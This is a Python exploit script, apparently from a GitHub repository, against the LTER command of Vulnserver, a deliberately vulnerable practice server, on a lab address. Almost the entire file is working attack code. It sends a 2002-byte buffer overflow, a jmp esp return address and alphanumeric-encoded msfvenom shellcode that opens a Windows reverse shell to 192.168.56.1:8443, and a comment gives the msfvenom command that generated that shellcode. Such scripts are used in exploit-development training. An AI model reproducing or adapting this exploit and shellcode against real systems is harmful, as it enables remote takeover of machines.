-
Notifications
You must be signed in to change notification settings - Fork 1
/
exploit_lter.py
82 lines (73 loc) · 3.97 KB
/
exploit_lter.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
#!/usr/bin/python
import socket
import os
import sys
host = "192.168.56.101"
port = 9999
# Allowed chars: 0x01 - 0x7F.
# Vulnserver substracts 0x7F from all other bytes. Both jmp_esp_addr and shellcode shouldn't contain only allowed chars
jmp_esp_addr = "\x03\x12\x50\x62"
# msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=8443 -f python -b '\x00\x0a\x0d' -e x86/alpha_mixed BufferRegister=ESP
buf = ""
buf += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51"
buf += "\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41"
buf += "\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54"
buf += "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
buf += "\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4d\x52"
buf += "\x43\x30\x35\x50\x55\x50\x53\x50\x4c\x49\x4b\x55\x36"
buf += "\x51\x49\x50\x33\x54\x4c\x4b\x46\x30\x56\x50\x4c\x4b"
buf += "\x30\x52\x34\x4c\x4c\x4b\x31\x42\x55\x44\x4c\x4b\x43"
buf += "\x42\x56\x48\x54\x4f\x58\x37\x31\x5a\x31\x36\x36\x51"
buf += "\x4b\x4f\x4e\x4c\x57\x4c\x33\x51\x53\x4c\x54\x42\x46"
buf += "\x4c\x47\x50\x59\x51\x48\x4f\x34\x4d\x43\x31\x48\x47"
buf += "\x4a\x42\x5a\x52\x56\x32\x31\x47\x4c\x4b\x56\x32\x52"
buf += "\x30\x4c\x4b\x30\x4a\x37\x4c\x4c\x4b\x30\x4c\x54\x51"
buf += "\x32\x58\x4d\x33\x51\x58\x35\x51\x4e\x31\x56\x31\x4c"
buf += "\x4b\x56\x39\x57\x50\x43\x31\x58\x53\x4c\x4b\x57\x39"
buf += "\x55\x48\x4d\x33\x36\x5a\x51\x59\x4c\x4b\x37\x44\x4c"
buf += "\x4b\x35\x51\x59\x46\x50\x31\x4b\x4f\x4e\x4c\x49\x51"
buf += "\x58\x4f\x34\x4d\x43\x31\x59\x57\x36\x58\x4b\x50\x34"
buf += "\x35\x4b\x46\x54\x43\x43\x4d\x4b\x48\x47\x4b\x33\x4d"
buf += "\x56\x44\x42\x55\x4d\x34\x46\x38\x4c\x4b\x30\x58\x47"
buf += "\x54\x35\x51\x4e\x33\x52\x46\x4c\x4b\x54\x4c\x50\x4b"
buf += "\x4c\x4b\x51\x48\x35\x4c\x35\x51\x38\x53\x4c\x4b\x34"
buf += "\x44\x4c\x4b\x53\x31\x38\x50\x4d\x59\x37\x34\x51\x34"
buf += "\x36\x44\x31\x4b\x51\x4b\x33\x51\x30\x59\x30\x5a\x30"
buf += "\x51\x4b\x4f\x4d\x30\x31\x4f\x51\x4f\x50\x5a\x4c\x4b"
buf += "\x45\x42\x4a\x4b\x4c\x4d\x31\x4d\x32\x48\x30\x33\x37"
buf += "\x42\x55\x50\x53\x30\x53\x58\x34\x37\x42\x53\x36\x52"
buf += "\x51\x4f\x56\x34\x43\x58\x30\x4c\x52\x57\x57\x56\x43"
buf += "\x37\x4b\x4f\x38\x55\x4f\x48\x5a\x30\x45\x51\x53\x30"
buf += "\x55\x50\x46\x49\x49\x54\x30\x54\x46\x30\x32\x48\x37"
buf += "\x59\x4d\x50\x52\x4b\x35\x50\x4b\x4f\x58\x55\x56\x30"
buf += "\x46\x30\x30\x50\x36\x30\x31\x50\x36\x30\x31\x50\x46"
buf += "\x30\x33\x58\x4b\x5a\x44\x4f\x59\x4f\x4d\x30\x4b\x4f"
buf += "\x4e\x35\x4a\x37\x42\x4a\x53\x35\x35\x38\x4f\x30\x49"
buf += "\x38\x47\x48\x45\x51\x55\x38\x34\x42\x35\x50\x47\x50"
buf += "\x4b\x4b\x4c\x49\x4a\x46\x43\x5a\x32\x30\x36\x36\x30"
buf += "\x57\x53\x58\x5a\x39\x39\x35\x52\x54\x43\x51\x4b\x4f"
buf += "\x58\x55\x4c\x45\x49\x50\x43\x44\x34\x4c\x4b\x4f\x50"
buf += "\x4e\x55\x58\x42\x55\x5a\x4c\x33\x58\x4c\x30\x48\x35"
buf += "\x49\x32\x46\x36\x4b\x4f\x49\x45\x32\x48\x52\x43\x52"
buf += "\x4d\x52\x44\x43\x30\x4b\x39\x4a\x43\x30\x57\x36\x37"
buf += "\x36\x37\x46\x51\x4b\x46\x52\x4a\x42\x32\x50\x59\x51"
buf += "\x46\x5a\x42\x4b\x4d\x55\x36\x38\x47\x37\x34\x56\x44"
buf += "\x57\x4c\x33\x31\x43\x31\x4c\x4d\x37\x34\x46\x44\x44"
buf += "\x50\x59\x56\x35\x50\x57\x34\x56\x34\x46\x30\x36\x36"
buf += "\x30\x56\x30\x56\x47\x36\x50\x56\x50\x4e\x46\x36\x50"
buf += "\x56\x56\x33\x46\x36\x33\x58\x34\x39\x48\x4c\x57\x4f"
buf += "\x4b\x36\x4b\x4f\x49\x45\x4d\x59\x4d\x30\x50\x4e\x50"
buf += "\x56\x50\x46\x4b\x4f\x30\x30\x53\x58\x45\x58\x4b\x37"
buf += "\x55\x4d\x55\x30\x4b\x4f\x4e\x35\x4f\x4b\x5a\x50\x48"
buf += "\x35\x49\x32\x31\x46\x32\x48\x4f\x56\x4a\x35\x4f\x4d"
buf += "\x4d\x4d\x4b\x4f\x59\x45\x47\x4c\x44\x46\x43\x4c\x55"
buf += "\x5a\x4d\x50\x4b\x4b\x4b\x50\x34\x35\x43\x35\x4f\x4b"
buf += "\x51\x57\x54\x53\x44\x32\x52\x4f\x42\x4a\x55\x50\x30"
buf += "\x53\x4b\x4f\x4e\x35\x41\x41"
payload = 2002 * "A" + 4 * "B" + jmp_esp_addr + buf
command = "LTER ." + payload + "\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
sock.recv(1024)
sock.send(command)
sock.close()